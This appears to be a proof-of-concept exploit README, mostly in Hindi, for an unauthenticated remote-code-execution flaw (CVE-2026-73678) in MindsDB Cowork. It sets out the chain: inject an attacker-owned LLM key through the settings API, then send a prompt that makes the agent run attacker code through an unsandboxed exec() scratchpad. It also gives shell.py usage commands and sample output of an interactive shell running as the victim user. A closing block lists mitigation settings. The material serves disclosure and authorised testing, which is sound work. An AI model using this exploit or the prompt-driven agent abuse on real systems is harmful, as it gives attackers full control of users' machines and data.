
CVE-2026-73678 के लिए PoC एक्सप्लॉइट: attacker-supplied LLM कुंजी और unsandboxed scratchpad exec के माध्यम से OS कमांड चलाने के लिए MindsDB Cowork में unauthenticated RCE।
CVE-2026-73678 के लिए PoC (CVSS 3.1 10.0 क्रिटिकल, AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)।
पूरा लेख: www.hunt-benito.com/blog/bring-your-own-key-cve-2026-73678-unauthenticated-rce-in-mindsdb-cowork/
Cowork का cowork-server FastAPI साइडकार /api/v1/ को बिना प्रमाणीकरण के उजागर करता है (CWE-306), CORS allow_origins=["*"] (CWE-942), और Anton एजेंट का scratchpad टूल LLM-जनित Python को बिना किसी सैंडबॉक्स के raw exec() के माध्यम से निष्पादित करता है (CWE-94)।
चेन: PUT /api/v1/settings/* के माध्यम से हमलावर की अपनी LLM कुंजी डालें → POST /api/v1/responses/ पर ऐसे प्रॉम्प्ट के साथ भेजें जो एजेंट को scratchpad पर हमलावर का कोड चलाने के लिए प्रेरित करे → ऐप चला रहे उपयोगकर्ता के रूप में मनमाना OS कमांड निष्पादन।
MindsDB के एडवाइज़री GHSA-jcxw-h8ph-pxpv में दिए गए PoC से अनुकूलित (श्रेय: Ho Viet Khanh / HK4zCzi)।
127.0.0.1:26866)# against a local dev instance (make dev-web)
python3 shell.py AIzaSy... gemini
# explicit target + model
API=http://127.0.0.1:26866/api/v1 python3 shell.py sk-... openai gpt-4o-mini
[*] Setting provider=gemini model=gemini-2.5-flash
[*] validate: {"status": "ok", "configReady": true, ...}
=======================================================
RCE SHELL (type shell commands, 'exit' to quit)
=======================================================
$ id
uid=1000(victim) gid=1000(victim) groups=1000(victim),27(sudo)
जनरेट किया गया स्निपेट os.urandom(4).hex() की गणना पीड़ित प्रक्रिया के अंदर करता है और उसे /tmp/RCE_PROOF.txt में लिखता है। प्रॉम्प्ट मॉडल को बताता है कि वह बिना निष्पादन के नॉन्स नहीं जान सकता। यदि लौटाया गया टेक्स्ट डिस्क पर मौजूद फ़ाइल से मेल खाने वाला नॉन्स रखता है, तो कोड स्पष्ट रूप से चला — एक भ्रमित (hallucinating) मॉडल इसे उत्पन्न नहीं कर सकता।
export COWORK_REQUIRE_AUTH=true # auth exists but defaults OFF
export COWORK_AUTH_TOKEN="<long-random>" # or let it auto-generate
export COWORK_ALLOWED_ORIGINS='["http://localhost:26866"]'
# never set COWORK_SERVER_HOST beyond 127.0.0.1; rotate all secrets reachable
# by the account that ran the app
कोई पैच किया गया रिलीज़ टैग मौजूद नहीं है; फिक्स केवल cowork-server/anton की main ब्रांच पर उपलब्ध हैं।
केवल अधिकृत सुरक्षा परीक्षण और शोध के लिए। उन सिस्टमों के विरुद्ध न चलाएँ जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।